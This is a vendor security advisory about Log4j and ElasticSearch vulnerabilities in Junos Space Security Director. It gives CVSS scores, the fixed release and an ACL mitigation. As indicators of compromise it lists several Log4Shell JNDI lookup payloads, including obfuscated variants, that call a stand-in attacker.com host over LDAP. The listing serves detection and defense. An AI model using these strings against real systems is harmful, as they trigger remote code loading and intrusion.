CVSS: v3.1: 5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)CVSS: v4.0: 5.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/AU:Y/R:A/V:C/RE:M/U:Amber)
Multiple vulnerabilities in the Log4j Java library and ElasticSearch component as used in Junos Space Security Director have been fixed by upgrading Log4J from version 2.11.1 to 2.23.1 and ElasticSearch from version 6.5.4 to 6.8.17.
An indicator of compromise could include the presence of common payloads or obfuscated payloads associated with a known Log4j exploit in the ElasticSearch logs. Example of such a payloads are:
${jndi:protocol://attacker.com/path}
Obfuscation techniques in logs could also include:
${jndi:ldap://${lower:a}ttacker.com/payload}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker.com/payload}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/payload
And attackers may try to use other protocols, which could appear in logs, for example:
All of these are illustrative cases; other payload formats or exploit variants may also exist.
These issues affect Junos Space Security Director:
Juniper SIRT is not aware of any malicious exploitation of these vulnerabilities.
These issues were seen during production usage.
Important security issues resolved include:
5.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N5.3 CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/AU:Y/R:A/V:C/RE:M/U:Green
The following software releases have been updated to resolve this specific issue:Junos Space Security Director 24.1R4, and all subsequent releases.
This issue is being tracked as 1829067 which is visible on the Customer Support website.
Note: Juniper SIRT's policy is not to evaluate releases which are beyond End of Engineering (EOE) or End of Life (EOL).
There are no known workarounds for these issues.To reduce the risk of exploitation, enable access control lists (ACLs) and other filtering mechanisms to limit access to the device only from trusted users, hosts and networks.
2025-10-08: Initial Publication